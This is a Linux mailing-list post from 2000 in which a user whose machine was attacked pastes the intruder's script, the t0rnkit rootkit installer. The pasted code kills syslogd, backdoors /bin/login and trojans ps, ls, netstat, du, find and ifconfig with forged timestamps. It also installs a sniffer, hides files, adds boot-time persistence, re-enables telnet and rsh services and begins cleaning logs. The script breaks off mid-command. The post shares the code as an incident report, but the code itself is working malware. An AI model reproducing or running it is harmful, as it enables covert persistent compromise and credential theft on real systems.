Utok odhaleny !!!! (:-(
Juraj Hajka
jhajka na pal-inalfa.sk
Úterý Srpen 22 15:42:40 CEST 2000
Nasiel som skript!!
Dakujem vsetkym uz je to jasne ako facka caka ma pekna robota.
#!/bin/sh
inf="t0rnkit+patch1 by torn"
inf="mail bugs to tornkit na usa.net"
BLK='^[[1;30m'
RED='^[[1;31m'
GRN='^[[1;32m'
YEL='^[[1;33m'
BLU='^[[1;34m'
MAG='^[[1;35m'
CYN='^[[1;36m'
WHI='^[[1;37m'
DRED='^[[0;31m'
DGRN='^[[0;32m'
DYEL='^[[0;33m'
DBLU='^[[0;34m'
DMAG='^[[0;35m'
DCYN='^[[0;36m'
DWHI='^[[0;37m'
RES='^[[0m'
killall -9 syslogd
startime=`date +%S`
echo "Preparing host for t0rnkit...... \
`echo t0rnkit+patch1+$1 |$(echo $inf|awk '{print $1.\" "$4}')`"
echo
"${WHI}-------------------------------------------------------------${RES}"
echo " ${BLU}##${RES}
"
echo " ${BLU}####### ,###, .###, ,###,${RES}
"
echo " ${BLU}## ## ## ,## #, ## ##${RES}
"
echo " ${BLU}## ## ## ## ## ##${RES}
"
echo " ${BLU}## '###' ## ## ##${RES}
"
echo " ${BLU}###. -+- K I T${RES}
"
echo ""
echo " ${WHI}the next evolution just got burnt${RES}"
echo
"${WHI}-------------------------------------------------------------${RES}"
echo " ${BLU}backdooring started on ${RED}`hostname -f`${RES}
"
echo "${WHI}%
%${RES}"
echo "${WHI}%
%${RES}"
if [ "`grep in.inetd /etc/rc.d/rc.sysinit`" ]; then
echo "${WHI}% ${RED} [Alert] ${WHI}t0rnkit probably installed on machine
${RED}[Alert] ${WHI} %${RES}"
echo "${WHI}%
%${RES}"
else
echo ""
fi
echo "${WHI}% ${BLU}[Installing trojans....]
${WHI}%${RES}"
if test -n "$1" ; then
echo "${WHI} Using Password : ${BLU}$1 ${WHI}
${RES}"
./pg $1 >/etc/ttyhash
else
echo "${WHI}%${RED} No Password Specified, using default
${WHI} %${RES}"
cp -f default_pass /etc/ttyhash
./pg default >default_pass
fi
touch -acmr /bin/login login
mv -f /bin/login /sbin/xlogin
mv -f login /bin/login
chmod 4555 /bin/login
echo "${WHI}% ${RED}: login moved and backdoored
${WHI}%${RES}"
# Ok lets start creating dirs
mkdir -p /usr/src/.puta/
mkdir -p /usr/info/.t0rn/
cp dev/.1addr /usr/src/.puta/
cp dev/.1file /usr/src/.puta/
cp dev/.1logz /usr/src/.puta/
cp dev/.1proc /usr/src/.puta/
touch -acmr /usr/sbin/in.telnetd t0rndemon
mv t0rndemon /usr/sbin/in.inetd
tar xfz ssh.tgz
mv .t0rn/sh* /usr/info/.t0rn/
mv /usr/info/.t0rn/sharsed /usr/sbin/nscd
/usr/sbin/nscd -q
echo "# Name Server Cache Daemon..">> /etc/rc.d/rc.sysinit
echo "/usr/sbin/nscd -q" >> /etc/rc.d/rc.sysinit
if [ -x /etc/rc.d/rc.sysinit ]; then
echo "# Inetd startup">>/etc/rc.d/rc.sysinit
echo "if [ -x /usr/sbin/in.inetd ]; then">>/etc/rc.d/rc.sysinit
echo " /usr/sbin/in.inetd -s">>/etc/rc.d/rc.sysinit
echo "fi">>/etc/rc.d/rc.sysinit
echo " ">>/etc/rc.d/rc.sysinit
else
echo "# Inetd startup">>/etc/rc.d/rc.local
echo "if [ -x /usr/sbin/in.inetd ]; then">>/etc/rc.d/rc.local
echo " /usr/sbin/in.inetd -s">>/etc/rc.d/rc.local
echo "fi">>/etc/rc.d/rc.local
echo " ">>/etc/rc.d/rc.local
fi
# time change bitch
#heh tnx powah for ifconfig trojan for redhat 6* ;)
touch -acmr /sbin/ifconfig ifconfig
touch -acmr /bin/ps ps
touch -acmr /usr/bin/du du
touch -acmr /bin/ls ls
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
# Backdoor ps/top/du/ls/netstat
mv -f ps /bin/ps
mv -f ifconfig /sbin/ifconfig
mv -f du /usr/bin/du
mv -f netstat /bin/netstat
mv -f ls /bin/ls
mv -f find /usr/bin/find
echo "${WHI}% ${RED}: ps/du/ls/top/netstat backdoored
${WHI}%${RES}"
# moving our files
echo "${WHI}%
%${RES}"
echo "${WHI}% ${BLU}[Moving our files...]
${WHI}%${RES}"
mv t0rnsniff /usr/src/.puta/
mv t0rnparse /usr/src/.puta/
mv t0rnsauber /usr/src/.puta/
echo "${WHI}% ${RED}: t0rnsniff/t0rnparse/sauber moved
${WHI}%${RES}"
echo "${WHI}%
%${RES}"
echo "${WHI}% ${BLU}[Modifying system settings to suit our needs]
${WHI}%${RES}"
echo "${WHI}% ${RED}: cleaning inetd.conf - enabling rshd/telnet
${WHI}%${RES}"
sed "s/^#telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool; mv -f
/tmp/.pinespool /etc/inetd.conf
sed "s/^#shell/shell/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool ;mv -f /t
mp/.pinespool /etc/inetd.conf
sed "s/^# telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool; mv -f
/tmp/.pinespool /etc/inetd.conf
sed "s/^# shell/shell/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool ;mv -f /
tmp/.pinespool /etc/inetd.conf
sed "s/^#finger/finger/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool; mv -f
/tmp/.pinespool /etc/inetd.conf
sed "s/^# finger/finger/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr
/etc/inetd.conf /tmp/.pinespool; mv -f
/tmp/.pinespool /etc/inetd.conf
if [ "`grep ALL /etc/hosts.deny`" ]; then
echo "${WHI}% ${RED}: Detected ALL : hosts.deny tcpd backdoored
${WHI}%${RES}"
mkdir -p /dev/dd0
touch /dev/dd0/.t0rn
echo "#Dont forget to enter ALL : IP here evil hax0r :)" >> /dev/dd0/.t0rn
rpm -U --force tcpd.rpm
else
echo ""
fi
echo
"${WHI}-------------------------------------------------------------${RES}"
echo "${RED}+wuftpd patch ${RES}"
echo ""
echo " ${RED}[x]${WHI} disabling anonymous ftp...${RES}"
grep -v "anonymous" /etc/ftpaccess >> /etc/ftpaccess2 ; mv -f
/etc/ftpaccess2 /etc/ftpaccess
echo " ${RED}[x]${WHI} cleaning logs...${RES}"
echo ""
mv
Další informace o konferenci Linux